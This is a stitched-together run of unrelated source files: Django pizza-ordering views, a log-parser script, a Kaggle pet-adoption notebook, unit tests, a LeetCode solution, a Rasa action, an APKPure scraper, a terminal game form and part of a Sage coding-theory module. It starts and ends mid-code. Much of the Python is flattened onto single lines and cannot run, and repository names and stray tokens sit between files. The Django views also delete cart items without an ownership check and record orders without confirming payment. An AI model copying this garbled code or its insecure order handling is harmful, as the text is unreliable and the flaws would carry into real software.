pattern.search(password) and len(password) >= 8: messages.error(request, "Password must be at least 8 characters; must contain at least one lowercase letter, one uppercase letter, one 
numeric digit, and one special character.") return render(request, "register.html") elif not confirmation: messages.error(request, "Confirm Password may not be left blank.") return render(request, "orders/register.html") elif password != confirmation: messages.error(request, "Passwords must match.") return render(request, "register.html") user = User.objects.create_user(username, email, password) user.first_name = first_name user.last_name = last_name user.save() login(request, user) return HttpResponseRedirect(reverse("index")) else: return render(request, "orders/register.html") def check(request): username = request.GET.get("username") email = request.GET.get("email") if username and User.objects.filter(username=username).exists(): return JsonResponse(False, safe=False) if email and User.objects.filter(email=email).exists(): return JsonResponse(False, safe=False) return JsonResponse(True, safe=False) def login_view(request): if request.method == 'POST': username = request.POST.get("username") password = request.POST.get("password") if not username: messages.error(request, "Username may not be left blank.") return render(request, "orders/login.html") elif not password: messages.error(request, "Password may not be left blank.") return render(request, "orders/login.html") user = authenticate(request, username=username, password=password) if not user: messages.error(request, "Invalid username and/or password.") return render(request, "orders/login.html") login(request, user) return HttpResponseRedirect(reverse("index")) else: return render(request, "orders/login.html") def logout_view(request): logout(request) messages.success(request, "Successfully logged out.") return HttpResponseRedirect(reverse("login_view")) def add_to_cart(request): item = request.POST.get("item") size = request.POST.get("size") toppings = request.POST.getlist("topping_ids") additions = request.POST.getlist("addition_ids") try: item_id = item.split("-")[-1] if item.startswith("reg-pizza"): item = RegularPizza.objects.get(pk=item_id) elif item.startswith("sic-pizza"): item = SicilianPizza.objects.get(pk=item_id) elif item.startswith("sub"): item = Sub.objects.get(pk=item_id) elif item.startswith("pasta"): item = Pasta.objects.get(pk=item_id) elif item.startswith("salad"): item = Salad.objects.get(pk=item_id) elif item.startswith("dinner-platter"): item = DinnerPlatter.objects.get(pk=item_id) else: raise ObjectDoesNotExist except ObjectDoesNotExist: messages.error(request, "Invalid Data.") return HttpResponseRedirect(reverse("index")) if getattr(item, "sm_price", False): if size == "Small": price = item.sm_price elif size == "Large": price = item.lg_price else: messages.error(request, "Please choose a size.") return HttpResponseRedirect(reverse("index")) else: if size is None: price = item.price else: messages.error(request, "Invalid Data.") return HttpResponseRedirect(reverse("index")) if getattr(item, "toppings", False): expected_toppings = 0 if item.name in ("1 topping", "1 item"): expected_toppings = 1 elif item.name in ("2 toppings", "2 items"): expected_toppings = 2 elif item.name in ("3 toppings", "3 items"): expected_toppings = 3 elif item.name == "Special": expected_toppings = 4 num_toppings = min(4, len(toppings)) if expected_toppings != num_toppings: messages.error(request, "Please select the correct number of toppings.") return HttpResponseRedirect(reverse("index")) for i, topping_id in enumerate(toppings): try: toppings[i] = Topping.objects.get(pk=topping_id) if toppings[i] not in item.toppings.all(): raise 
ObjectDoesNotExist except ObjectDoesNotExist: messages.error(request, "Invalid Data.") return HttpResponseRedirect(reverse("index")) else: if len(toppings) > 0: messages.error(request, "Invalid Data.") return HttpResponseRedirect(reverse("index")) if getattr(item, "additions", False): for i, addition_id in enumerate(additions): try: additions[i] = Addition.objects.get(pk=addition_id) if additions[i] in item.additions.all(): price += additions[i].price else: raise ObjectDoesNotExist except ObjectDoesNotExist: messages.error(request, "Invalid Data.") return HttpResponseRedirect(reverse("index")) else: if len(additions) > 0: messages.error(request, "Invalid Data.") return HttpResponseRedirect(reverse("index")) cart_item = CartItem( item=item, size=size, price=price, user=request.user ) cart_item.save() cart_item.toppings.set(toppings) cart_item.additions.set(additions) cart_item.save() return HttpResponseRedirect(reverse("index")) def cart(request): if request.method == 'POST': cart_item_id = request.POST.get("cart_item_id") try: cart_item = CartItem.objects.get(pk=cart_item_id) except ObjectDoesNotExist: messages.error(request, "Invalid Data.") return HttpResponseRedirect(reverse("index")) cart_item.delete() return HttpResponseRedirect(reverse("cart")) else: cart_items = CartItem.objects.filter( user=request.user, pending=False ) total_price = sum([cart_item.price for cart_item in cart_items]) return render(request, "orders/cart.html", { "cart_items": cart_items, "total_price": total_price }) def stripe_session(request): cart_items = CartItem.objects.filter( user=request.user, pending=False ) total_price = sum([cart_item.price for cart_item in cart_items]) session = stripe.checkout.Session.create( payment_method_types=["card"], line_items=[{ "price_data": { "currency": "usd", "product_data": { "name": "Pinocchio's Pizza & Subs", }, "unit_amount": int(total_price * 100), }, "quantity": 1, }], mode="payment", success_url=f"{DOMAIN}{HttpResponseRedirect(reverse('checkout')).url}?session_id={{CHECKOUT_SESSION_ID}}", cancel_url=f"{DOMAIN}{HttpResponseRedirect(reverse('cart')).url}" ) return JsonResponse({ "session_id": session.id, "stripe_public_key": STRIPE_PUBLIC_KEY }) def checkout(request): cart_items = CartItem.objects.filter( user=request.user, pending=False ) total_price = sum([cart_item.price for cart_item in cart_items]) order = Order( user=request.user, total_price=total_price ) order.save() for cart_item in cart_items: cart_item.order = order cart_item.pending = True cart_item.save() messages.success(request, "Order successfully submitted!") return HttpResponseRedirect(reverse("index")) def orders(request): cart_items = CartItem.objects.filter( user=request.user, pending=False ) current_orders = Order.objects.filter( user=request.user, complete=False ) past_orders = Order.objects.filter( user=request.user, complete=True ) return render(request, "orders/orders.html", { "cart_items": cart_items, "current_orders": current_orders, "past_orders": past_orders }) WuJialei/logparser0 #!/usr/bin/env python # -*- coding: UTF-8 -*- import sys import time, threading sys.path.append('../') from logparser import Drain input_dir = '../logs/test/' # The input directory of log file output_dir = 'Drain_test_result/' # The output directory of parsing results ''' 0: access.log #/apache2 ' ' 1: cinder_error.log #/apache2 ' ' 2: error.log.1 #/apache2 ' ' 3: keystone_access.log #/apache2 ' ' 4: nova_placement_access.log #/apache2 ' ' 5: nova_placement_error.log.1 #/apache2 ' ' ''' log_files = ['access.log', 
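# One Drain parser thread is started per log file below (see call_logParser and the
# threading loop further down); the blank log_formats entries mirror this file list.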
'cinder_error.log', 'error.log.1', 'keystone_access.log', 'nova_placement_access.log', 'nova_placement_error.log.1'] # The input log file name log_formats = [' ', ' ', ' ', ' ', ' ', ' '] # HDFS log format cnt = 6 # Regular expression list for optional preprocessing (default: []) regex = [ r'blk_(|-)[0-9]+' , # block id r'(/|)([0-9]+\.){3}[0-9]+(:[0-9]+|)(:|)', # IP r'(?<=[^A-Za-z0-9])(\-?\+?\d+)(?=[^A-Za-z0-9])|[0-9]+$', # Numbers ] st = 0.5 # Similarity threshold depth = 4 # Depth of all leaf nodes #call LogParser def call_logParser(n, in_dir, out_dir, dep, st_v, rex_v): parser = Drain.LogParser(log_formats[n], indir=in_dir, outdir=out_dir, depth=dep, st=st_v, rex=rex_v) parser.parse(log_files[n]) for i in range(cnt): t = threading.Thread(target=call_logParser, args=(i, input_dir, output_dir, depth, st, regex), name='{}_{}'.format('thread', log_files[i])) t.start() #!/usr/bin/env python3 ''' A starting point for a program ''' import sys import logging import time import argparse from sqlalchemy.orm.exc import NoResultFound from myapp.util import session, dbinit, setuplogging from myapp.config import loadconf, Config if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument("--conf_location", help="Location for configuration files") args = parser.parse_args() conf_location = './myapp/etc/' if args.conf_location: conf_location = args.conf_location loadconf(conf_location) setuplogging(conf_location) dbinit() import myapp.models as model logger = logging.getLogger('program') logger.info('Starting program.py') some_config = Config.CONF.get('something', 'some_config') while True: logger.debug('Get session') ses = session() try: logger.debug('Load something from the database') uploads = ses.query(model.Something).all() except NoResultFound: logger.error('Could not query somethings') sys.exit(1) logger.debug('Close session and sleep') ses.commit() ses.close() time.sleep(10) # --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: percent # format_version: '1.2' # jupytext_version: 1.0.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # %% {"_uuid": "8f2839f25d086af736a60e9eeb907d3b93b6e0e5", "_cell_guid": "b1076dfc-b9ad-4769-8c92-a6c4dae69d19"} import numpy as np import pandas as pd import os import xgboost as xgb from sklearn.feature_extraction.text import TfidfVectorizer from sklearn.preprocessing import LabelEncoder from scipy import sparse from sklearn.decomposition import TruncatedSVD from sklearn.model_selection import train_test_split, KFold, StratifiedKFold import scipy as sp from sklearn import linear_model from functools import partial from sklearn import metrics from collections import Counter import json import lightgbm as lgb # %% {"_uuid": "77161d0931b6ce8d627967c419f813ccf4c859f8"} # The following 3 functions have been taken from ner's github repository # https://github.com/benhamner/Metrics def confusion_matrix(rater_a, rater_b, min_rating=None, max_rating=None): """ Returns the confusion matrix between rater's ratings """ assert(len(rater_a) == len(rater_b)) if min_rating is None: min_rating = min(rater_a + rater_b) if max_rating is None: max_rating = max(rater_a + rater_b) num_ratings = int(max_rating - min_rating + 1) conf_mat = [[0 for i in range(num_ratings)] for j in range(num_ratings)] for a, b in zip(rater_a, rater_b): conf_mat[a - min_rating][b - min_rating] += 1 return conf_mat def histogram(ratings, min_rating=None, max_rating=None): """ Returns the counts of each type of rating that a 
rater made """ if min_rating is None: min_rating = min(ratings) if max_rating is None: max_rating = max(ratings) num_ratings = int(max_rating - min_rating + 1) hist_ratings = [0 for x in range(num_ratings)] for r in ratings: hist_ratings[r - min_rating] += 1 return hist_ratings def quadratic_weighted_kappa(y, y_pred): """ Calculates the quadratic weighted kappa axquadratic_weighted_kappa calculates the quadratic weighted kappa value, which is a measure of inter-rater agreement between two raters that provide discrete numeric ratings. Potential values range from -1 (representing complete disagreement) to 1 (representing complete agreement). A kappa value of 0 is expected if all agreement is due to chance. quadratic_weighted_kappa(rater_a, rater_b), where rater_a and rater_b each correspond to a list of integer ratings. These lists must have the same length. The ratings should be integers, and it is assumed that they contain the complete range of possible ratings. quadratic_weighted_kappa(X, min_rating, max_rating), where min_rating is the minimum possible rating, and max_rating is the maximum possible rating """ rater_a = y rater_b = y_pred min_rating=None max_rating=None rater_a = np.array(rater_a, dtype=int) rater_b = np.array(rater_b, dtype=int) assert(len(rater_a) == len(rater_b)) if min_rating is None: min_rating = min(min(rater_a), min(rater_b)) if max_rating is None: max_rating = max(max(rater_a), max(rater_b)) conf_mat = confusion_matrix(rater_a, rater_b, min_rating, max_rating) num_ratings = len(conf_mat) num_scored_items = float(len(rater_a)) hist_rater_a = histogram(rater_a, min_rating, max_rating) hist_rater_b = histogram(rater_b, min_rating, max_rating) numerator = 0.0 denominator = 0.0 for i in range(num_ratings): for j in range(num_ratings): expected_count = (hist_rater_a[i] * hist_rater_b[j] / num_scored_items) d = pow(i - j, 2.0) / pow(num_ratings - 1, 2.0) numerator += d * conf_mat[i][j] / num_scored_items denominator += d * expected_count / num_scored_items return (1.0 - numerator / denominator) # %% {"_uuid": "f9c15a9a24576fb4c720fb4fd9db4600220896d0"} class OptimizedRounder(object): def __init__(self): self.coef_ = 0 def _kappa_loss(self, coef, X, y): X_p = np.copy(X) for i, pred in enumerate(X_p): if pred < coef[0]: X_p[i] = 0 elif pred >= coef[0] and pred < coef[1]: X_p[i] = 1 elif pred >= coef[1] and pred < coef[2]: X_p[i] = 2 elif pred >= coef[2] and pred < coef[3]: X_p[i] = 3 else: X_p[i] = 4 ll = quadratic_weighted_kappa(y, X_p) return -ll def fit(self, X, y): loss_partial = partial(self._kappa_loss, X=X, y=y) initial_coef = [0.5, 1.5, 2.5, 3.5] self.coef_ = sp.optimize.minimize(loss_partial, initial_coef, method='nelder-mead') def predict(self, X, coef): X_p = np.copy(X) for i, pred in enumerate(X_p): if pred < coef[0]: X_p[i] = 0 elif pred >= coef[0] and pred < coef[1]: X_p[i] = 1 elif pred >= coef[1] and pred < coef[2]: X_p[i] = 2 elif pred >= coef[2] and pred < coef[3]: X_p[i] = 3 else: X_p[i] = 4 return X_p def coefficients(self): return self.coef_['x'] # %% {"_cell_guid": "79c7e3d0-c299-4dcb-8224-4455121ee9b0", "_uuid": "d629ff2d2480ee46fbb7e2d37f6b5fab8052498a"} train = pd.read_csv('../input/train/train.csv') test = pd.read_csv('../input/test/test.csv') # %% {"_uuid": "b8d7ffdf6906478c6ba00bd26405088eb8a36656"} # train[train.AdoptionSpeed==0] # %% {"_uuid": "3b4da8ff030a20a7daaa73ea910adc106d75f95f"} doc_sent_mag = [] doc_sent_score = [] nf_count = 0 for pet in train.PetID.values: try: with open('../input/train_sentiment/' + pet + '.json', 'r') as f: 
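# Each PetID may have a matching sentiment JSON; its documentSentiment magnitude and
# score are collected, while missing files increment nf_count and fall back to -1.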
sentiment = json.load(f) doc_sent_mag.append(sentiment['documentSentiment']['magnitude']) doc_sent_score.append(sentiment['documentSentiment']['score']) except FileNotFoundError: nf_count += 1 doc_sent_mag.append(-1) doc_sent_score.append(-1) # %% {"_uuid": "936005439ef1387902251657bc9c81cd834ca68d"} train['doc_sent_mag'] = doc_sent_mag train['doc_sent_score'] = doc_sent_score # %% {"_uuid": "f33296918b38649dd1cf0bf209e5295b958de7cd"} nf_count # %% {"_uuid": "b0736bd6f47b95d965908c236d7f0e6e3b6c4a0d"} doc_sent_mag = [] doc_sent_score = [] nf_count = 0 for pet in test.PetID.values: try: with open('../input/test_sentiment/' + pet + '.json', 'r') as f: sentiment = json.load(f) doc_sent_mag.append(sentiment['documentSentiment']['magnitude']) doc_sent_score.append(sentiment['documentSentiment']['score']) except FileNotFoundError: nf_count += 1 doc_sent_mag.append(-1) doc_sent_score.append(-1) # %% {"_uuid": "99f80c6f98c101f4648cf1ab2c9af1de56862ef6"} test['doc_sent_mag'] = doc_sent_mag test['doc_sent_score'] = doc_sent_score # %% {"_uuid": "d963f18679dd3e13de5697bc94ec55a334695db5"} nf_count # %% {"_uuid": "c354ed2372c7b019755376d6c3a004b2223f78b2"} lbl_enc = LabelEncoder() lbl_enc.fit(train.RescuerID.values.tolist() + test.RescuerID.values.tolist()) train.RescuerID = lbl_enc.transform(train.RescuerID.values) test.RescuerID = lbl_enc.transform(test.RescuerID.values) # %% {"_uuid": "228b9ac44451329b2abca99629b859955666262c"} train_desc = train.Description.fillna("none").values test_desc = test.Description.fillna("none").values tfv = TfidfVectorizer(min_df=3, max_features=None, strip_accents='unicode', analyzer='word', token_pattern=r'\w{1,}', ngram_range=(1, 3), use_idf=1, smooth_idf=1, sublinear_tf=1, stop_words = 'english') # Fit TFIDF tfv.fit(list(train_desc) + list(test_desc)) X = tfv.transform(train_desc) X_test = tfv.transform(test_desc) svd = TruncatedSVD(n_components=180) svd.fit(X) X = svd.transform(X) X_test = svd.transform(X_test) # %% {"_uuid": "612000ae8312b3f78698a41add1787c528617132"} y = train.AdoptionSpeed # %% {"_uuid": "287d378245614e0d7a2bbe4b7979681dc89587dc"} y.value_counts() # %% {"_uuid": "b3f01cfee25b40d08a1bebb306aa280c8c0d975b"} train = np.hstack((train.drop(['Name', 'Description', 'PetID', 'AdoptionSpeed'], axis=1).values, X)) test = np.hstack((test.drop(['Name', 'Description', 'PetID'], axis=1).values, X_test)) # %% {"_uuid": "c63c99a4f66179cf71ac0ca1c484881796f2bd5f"} train_predictions = np.zeros((train.shape[0], 1)) test_predictions = np.zeros((test.shape[0], 1)) zero_test_predictions = np.zeros((test.shape[0], 1)) FOLDS = 3 print("stratified k-folds") skf = StratifiedKFold(n_splits=FOLDS, random_state=42, shuffle=True) skf.get_n_splits(train, y) cv_scores = [] fold = 1 coefficients = np.zeros((FOLDS, 4)) for train_idx, valid_idx in skf.split(train, y): xtrain, xvalid = train[train_idx], train[valid_idx] xtrain_text, xvalid_text = X[train_idx], X[valid_idx] ytrain, yvalid = y.iloc[train_idx], y.iloc[valid_idx] w = y.value_counts() weights = {i : np.sum(w) / w[i] for i in w.index} print(weights) #model = xgb.XGBRegressor(n_estimators=500, nthread=-1, max_depth=19, learning_rate=0.01, min_child_weight = 150, colsample_bytree=0.8) lgb_params = { 'boosting_type': 'gbdt', 'objective': 'regression', 'learning_rate': 0.005, 'subsample': .8, 'colsample_bytree': 0.8, 'min_split_gain': 0.006, 'min_child_samples': 150, 'min_child_weight': 0.1, 'max_depth': 17, 'n_estimators': 10000, 'num_leaves': 80, 'silent': -1, 'verbose': -1, 'max_depth': 11, 'random_state': 2018 } model = 
lgb.LGBMRegressor(**lgb_params) model.fit( xtrain, ytrain, eval_set=[(xvalid, yvalid)], eval_metric='rmse', verbose=100, early_stopping_rounds=100 ) #model.fit(xtrain, ytrain) valid_preds = model.predict(xvalid, num_iteration=model.best_iteration_) optR = OptimizedRounder() optR.fit(valid_preds, yvalid.values) coefficients[fold-1,:] = optR.coefficients() valid_p = optR.predict(valid_preds, coefficients[fold-1,:]) print("Valid Counts = ", Counter(yvalid.values)) print("Predicted Counts = ", Counter(valid_p)) test_preds = model.predict(test, num_iteration=model.best_iteration_) scr = quadratic_weighted_kappa(yvalid.values, valid_p) cv_scores.append(scr) print("Fold = {}. QWK = {}. Coef = {}".format(fold, scr, coefficients[fold-1,:])) print("\n") train_predictions[valid_idx] = valid_preds.reshape(-1, 1) test_predictions += test_preds.reshape(-1, 1) fold += 1 test_predictions = test_predictions * 1./FOLDS print("Mean Score: {}. Std Dev: {}. Mean Coeff: {}".format(np.mean(cv_scores), np.std(cv_scores), np.mean(coefficients, axis=0))) # %% {"_uuid": "1cf0f817ff7048f4d77d2f153d9fdbb0fb98a237"} # %% {"_uuid": "13e0e8cde2f271c6783b87b0ff44b63a284169c6"} optR = OptimizedRounder() train_predictions = np.array([item for sublist in train_predictions for item in sublist]) optR.fit(train_predictions, y) coefficients = optR.coefficients() print(quadratic_weighted_kappa(y, optR.predict(train_predictions, coefficients))) predictions = optR.predict(test_predictions, coefficients).astype(int) predictions = [item for sublist in predictions for item in sublist] # %% {"_uuid": "4604b0219c467ee0bfe18a4491463fba7e04779e"} sample = pd.read_csv('../input/test/sample_submission.csv') # %% {"_uuid": "da9b6b80b21ddeabfcef556a6cb65f38ae675b2b"} sample.AdoptionSpeed = predictions # %% {"_uuid": "bfc98b6c249a187cfe25cdb4448382325166f3f4"} sample.to_csv('submission.csv', index=False) # %% {"_uuid": "87392765ce9a0b7dc1426323bf7be8d8aad230c5"} sample.dtypes # %% {"_uuid": "d920a49d4554faa12474b9fa6759c9aa1ee6931c"} sample.AdoptionSpeed.value_counts() # %% {"_uuid": "17004d159a6e1a67620d2b2b9126e36e243e7e9d"} sample.head() # %% {"_uuid": "1848ae9e76e383e911f0f760895722d9d8e91953"} # %% {"_uuid": "0b4d3079f7d08aee467992f5be7e65bf7d6da045"} ivan-yosifov88/python_oop_june_2021 import unittest from project.player.beginner import Beginner class TestBeginner(unittest.TestCase): def test_init_method__when_all_correct__should_set(self): beginner = Beginner("Test") self.assertEqual("Test", beginner.username) self.assertEqual(50, beginner.initial_points) def test_username__when_empty_should_raise_ValueError(self): with self.assertRaises(ValueError) as message: beginner = Beginner("") self.assertEqual("Player's username cannot be an empty string.", str(message.exception)) def test_health__when_value_is_less_than_0__should_raise_ValueError(self): beginner = Beginner("Test") with self.assertRaises(ValueError) as message: beginner.health = -1 self.assertEqual("Player's health bonus cannot be less than zero.", str(message.exception)) def test_take_damage__when_points_are_less_than_0__should_raise_ValueError(self): damage_points = -1 beginner = Beginner("Test") with self.assertRaises(ValueError) as message: beginner.take_damage(damage_points) self.assertEqual("Damage points cannot be less than zero.", str(message.exception)) def test_take_damage__when_points_are_greater_than_0__should_decrease_health(self): damage_points = 5 beginner = Beginner("Test") beginner.take_damage(damage_points) self.assertEqual(45, beginner.health) def 
test_is_dead_property__when_health_is_greater_than_zero__should_return_False(self): beginner = Beginner("Test") damage_points = 5 beginner.take_damage(damage_points) self.assertFalse(beginner.is_dead) if __name__ == "__main__": unittest.main() class Solution: def XXX(self, height: List[int]) -> int: l, r, res = 0, len(height) - 1, 0 while l < r: res = max(res, min(height[l], height[r]) * (r - l)) if height[l] < height[r]: i = l + 1 while i < r and height[i] <= height[l]: i += 1 l = i else: j = r - 1 while j > l and height[j] <= height[r]: j -= 1 r = j return res undefined for (i = 0; i < document.getElementsByTagName("code").length; i++) { console.log(document.getElementsByTagName("code")[i].innerText); } # This files contains your custom actions which can be used to run # custom Python code. # # See this guide on how to implement these action: # https://rasa.com/docs/rasa/core/actions/#custom-actions/ # This is a simple example for a custom action which utters "Hello World!" from typing import Any, Text, Dict, List from rasa_sdk import Action, Tracker from rasa_sdk.executor import CollectingDispatcher timezones = { "London": "UTC+1:00" } class ActionFindAndShowTimeZone(Action): def name(self) -> Text: return "action_find_and_show_time_zone" def run(self, dispatcher: CollectingDispatcher, tracker: Tracker, domain: Dict[Text, Any]) -> List[Dict[Text, Any]]: city = tracker.get_slot("city") timezone = timezones.get(city) if timezone is None: output = "Could not find the time zone for {}".format(city) else: output = "The time zone for {} is {}".format(city, timezone) dispatcher.utter_message(text=output) return [] 0 # -*- coding: utf-8 -*- # # Copyright (c) 2020~2999 - Cologler <> # ---------- # # ---------- from urllib.parse import quote, urlsplit from logging import Logger from bs4 import BeautifulSoup import progressbar import requests BASE_URL = "https://apkpure.com" class ApkPure: def __init__(self, logger: Logger) -> None: self._logger = logger def _get_soup(self, url: str): r = requests.get(url, timeout=30) return BeautifulSoup(r.content, features='html.parser') def _get_direct_download_url(self, dlpage_url: str): self._logger.debug(f'download page url: {dlpage_url}') soup = self._get_soup(dlpage_url) download_link = soup.select_one('#download_link') if download_link: download_url = download_link['href'] return download_url def _get_variants(self, variant_url: str): self._logger.debug(f'variants page url: {variant_url}') variants = [] soup = self._get_soup(variant_url) for row in soup.select('div.table-row'): if 'table-head' not in row['class']: cols = list(row.select('.table-cell')) variants.append(dict( arch=cols[1].text, url=BASE_URL+cols[4].select_one('a')['href'] )) self._logger.debug(f'found {len(variants)} variants: {[v["arch"] for v in variants]}.') return variants def _get_latest_version_info(self, versions_url: str): self._logger.debug(f'versions page url: {versions_url}') soup = self._get_soup(versions_url) for item in soup.select('.ver-wrap li a'): file_type = item.select_one('.ver-item-t').text.lower() # apk or xapk if file_type not in ('apk', 'xapk'): self._logger.warning(f'unknown file type: {file_type}.') if file_type == 'apk': version = item.select_one('.ver-item-n').text assert version[0] == 'V' version = version[1:] apk_page_url = BASE_URL + item['href'] scope = urlsplit(apk_page_url).path.split('/')[3] if scope == 'variant': variants = self._get_variants(apk_page_url) variant = ([v for v in variants if v['arch'] == 'armeabi-v7a']+[None])[0] assert variant, variants 
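                    # The `([... if v['arch'] == 'armeabi-v7a'] + [None])[0]` idiom above yields
                    # the first armeabi-v7a build, or None when that architecture is not offered;
                    # the assert then aborts with the full variant list so a missing
                    # architecture is easy to spot in the logs.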
download_page_url = variant['url'] elif scope == 'download': download_page_url = apk_page_url else: self._logger.warning(f'unknown sub path: {scope}') continue download_url = self._get_direct_download_url(download_page_url) return dict( version=version, download_url=download_url ) def find_latest_package_info(self, name: str): url = f'{BASE_URL}/search?q={quote(name)}' soup = self._get_soup(url) a = soup.select_one('p.search-title a') if not a: self._logger.debug(f'no search result.') return None if not a['href'].endswith(name): self._logger.debug(f'no package match {name}') return None versions_url = BASE_URL + a['href'] + '/versions' return self._get_latest_version_info(versions_url) thmslmr/timebomb-client import npyscreen class CutForm(npyscreen.ActionForm): """Form display when user want to cut a card.""" CANCEL_BUTTON_TEXT = "CANCEL" OK_BUTTON_TEXT = "CUT" DEFAULT_COLUMNS = 60 DEFAULT_LINES = 12 def create(self): """Create Form.""" self.keypress_timeout = 1 self.center_on_display() self.name = "Who to cut ?" self.widgets = { "players": self.add( npyscreen.TitleSelectOne, scroll_exit=True, name="Players", values=range(7), ) } # HACK self.widgets["players"].entry_widget.cursor_line = 0 def while_waiting(self): """Use to display properly player names.""" if type(self.widgets["players"].values) is not list: targets = self.get_targets() self.widgets["players"].values = [t.name for t in targets] self.widgets["players"].update() def get_targets(self): """Get list of sorted (by name) potential targets. Returns: list: List of player objects. """ room_state = self.parentApp.state.room me_state = self.parentApp.state.me return sorted( [player for player in room_state.players if player.id != me_state.id], key=lambda item: item.name, ) def on_ok(self): """Emit cut event and switch form once ok is hit.""" value = self.widgets["players"].value if len(value) == 0: return targets = self.get_targets() target_id = [t.id for t in targets][value[0]] self.parentApp.sio.cut(target_id) self.parentApp.switchForm("GAME") def on_cancel(self): """Back to game form.""" self.parentApp.switchForm("GAME") r""" Gabidulin Code This module provides the :class:`~sage.coding.gabidulin.GabidulinCode`, which constructs Gabidulin Codes that are the rank metric equivalent of Reed Solomon codes and are defined as the evaluation codes of degree-restricted skew polynomials. This module also provides :class:`~sage.coding.gabidulin.GabidulinPolynomialEvaluationEncoder`, an encoder with a skew polynomial message space and :class:`~sage.coding.gabidulin.GabidulinVectorEvaluationEncoder`, an encoder based on the generator matrix. It also provides a decoder :class:`~sage.coding.gabidulin.GabidulinGaoDecoder` which corrects errors using the Gao algorithm in the rank metric. AUTHOR: - (2016-08-16) - (2019-08-19): initial version """ from sage.matrix.constructor import matrix from sage.modules.free_module_element import vector from sage.coding.encoder import Encoder from sage.coding.decoder import Decoder, DecodingError from sage.coding.linear_rank_metric import AbstractLinearRankMetricCode from sage.categories.fields import Fields class GabidulinCode(AbstractLinearRankMetricCode): """ A Gabidulin Code. DEFINITION: A linear Gabidulin code Gab[n, k] over `F_{q^m}` of length `n` (at most `m`) and dimension `k` (at most `n`) is the set of all codewords, that are the evaluation of a `q`-degree restricted skew polynomial `f(x)` belonging to the skew polynomial constructed over the base ring `F_{q^m}` and the twisting homomorphism `\sigma`. 
.. math:: \{ \text{Gab[n, k]} = \big\{ (f(g_0) f(g_1) ... f(g_{n-1})) = f(\textbf{g}) : \text{deg}_{q}f(x) < k \big\} \} where the fixed evaluation points `g_0, g_1,..., g_{n-1}` are linearly independent over `F_{q^m}`. EXAMPLES: A Gabidulin Code can be constructed in the following way: sage: Fqm = GF(16) sage: Fq = GF(4) sage: C = codes.GabidulinCode(Fqm, 2, 2, Fq) sage: C [2, 2, 1] linear Gabidulin code over GF(16)/GF(4) """ _registered_encoders = {} _registered_decoders = {} def __init__(self, base_field, length, dimension, sub_field=None, twisting_homomorphism=None, evaluation_points=None): r""" Representation of a Gabidulin Code. INPUT: - ``base_field`` -- finite field of order `q^m` where `q` is a prime power and `m` is an integer - ``length`` -- length of the resulting code - ``dimension`` -- dimension of the resulting code - ``sub_field`` -- (default: ``None``) finite field of order `q` which is a subfield of the ``base_field``. If not given, it is the prime subfield of the ``base_field``. - ``twisting_homomorphism`` -- (default: ``None``) homomorphism of the underlying skew polynomial ring. If not given, it is the Frobenius endomorphism on ``base_field``, which sends an element `x` to `x^{q}`. - ``evaluation_points`` -- (default: ``None``) list of elements `g_0, g_1,...,g_{n-1}` of the ``base_field`` that are linearly independent over the ``sub_field``. These elements form the first row of the generator matrix. If not specified, these are the `nth` powers of the generator of the ``base_field``. Both parameters ``sub_field`` and ``twisting_homomorphism`` are optional. Since they are closely related, here is a complete list of behaviours: - both ``sub_field`` and ``twisting_homomorphism`` given -- in this case we only check that given that ``twisting_homomorphism`` has a fixed field method, it returns ``sub_field`` - only ``twisting_homomorphism`` given -- we set ``sub_field`` to be the fixed field of the ``twisting_homomorphism``. If such method does not exist, an error is raised. - only ``sub_field`` given -- we set ``twisting_homomorphism`` to be the Frobenius of the field extension - neither ``sub_field`` or ``twisting_homomorphism`` given -- we take ``sub_field`` to be the prime field of ``base_field`` and the ``twisting_homomorphism`` to be the Frobenius wrt. the prime field TESTS: If ``length`` is bigger than the degree of the extension, an error is raised:: sage: C = codes.GabidulinCode(GF(64), 4, 3, GF(4)) Traceback (most recent call last): ... ValueError: 'length' can be at most the degree of the extension, 3 If the number of evaluation points is not equal to the length of the code, an error is raised: sage: Fqm = GF(5^20) sage: Fq = GF(5) sage: aa = Fqm.gen() sage: evals = [ aa^i for i in range(21) ] sage: C = codes.GabidulinCode(Fqm, 2, 2, Fq, None, evals) Traceback (most recent call last): ... ValueError: the number of evaluation points should be equal to the length of the code If evaluation points are not linearly independent over the ``base_field``, an error is raised: sage: evals = [ aa*i for i in range(2) ] sage: C = codes.GabidulinCode(Fqm, 2, 2, Fq, None, evals) Traceback (most recent call last): ... ValueError: the evaluation points provided are not linearly independent If an evaluation point does not belong to the ``base_field``, an error is raised: sage: a = GF(3).gen() sage: evals = [ a*i for i in range(2) ] sage: C = codes.GabidulinCode(Fqm, 2, 2, Fq, None, evals) Traceback (most recent call last): ... 
ValueError: evaluation point does not belong to the 'base field' Given that both ``sub_field`` and ``twisting_homomorphism`` are specified and ``twisting_homomorphism`` has a fixed field method. If the fixed field of ``twisting_homomorphism`` is not ``sub_field``, an error is raised: sage: Fqm = GF(64) sage: Fq = GF(8) sage: twist = GF(64).frobenius_endomorphism(n=2) sage: C = codes.GabidulinCode(Fqm, 3, 2, Fq, twist) Traceback (most recent call last): ... ValueError: the fixed field of the twisting homomorphism has to be the relative field of the extension If ``twisting_homomorphism`` is given, but ``sub_field`` is not. In case ``twisting_homomorphism`` does not have a fixed field method, and error is raised: sage: Fqm. = GF(64) sage: sigma = Hom(Fqm, Fqm)[1]; sigma Ring endomorphism of Finite Field in z6 of size 2^6 Defn: z6 |--> z6^2 sage: C = codes.GabidulinCode(Fqm, 3, 2, None, sigma) Traceback (most recent call last): ... ValueError: if 'sub_field' is not given, the twisting homomorphism has to have a 'fixed_field' method """ twist_fix_field = None have_twist = (twisting_homomorphism != None) have_subfield = (sub_field != None) if have_twist and have_subfield: try: twist_fix_field = twisting_homomorphism.fixed_field()[0] except AttributeError: pass if twist_fix_field and twist_fix_field.order() != sub_field.order(): raise ValueError("the fixed field of the twisting homomorphism has to be the relative field of the extension") if have_twist and not have_subfield: if not twist_fix_field: raise ValueError("if 'sub_field' is not given, the twisting homomorphism has to have a 'fixed_field' method") else: sub_field = twist_fix_field if (not have_twist) and have_subfield: twisting_homomorphism = base_field.frobenius_endomorphism(n=sub_field.degree()) if (not have_twist) and not have_subfield: sub_field = base_field.base_ring() twisting_homomorphism = base_field.frobenius_endomorphism() self._twisting_homomorphism = twisting_homomorphism super(GabidulinCode, self).__init__(base_field, sub_field, length, "VectorEvaluation", "Gao") if length > self.extension_degree(): raise ValueError("'length' can be at most the degree of the 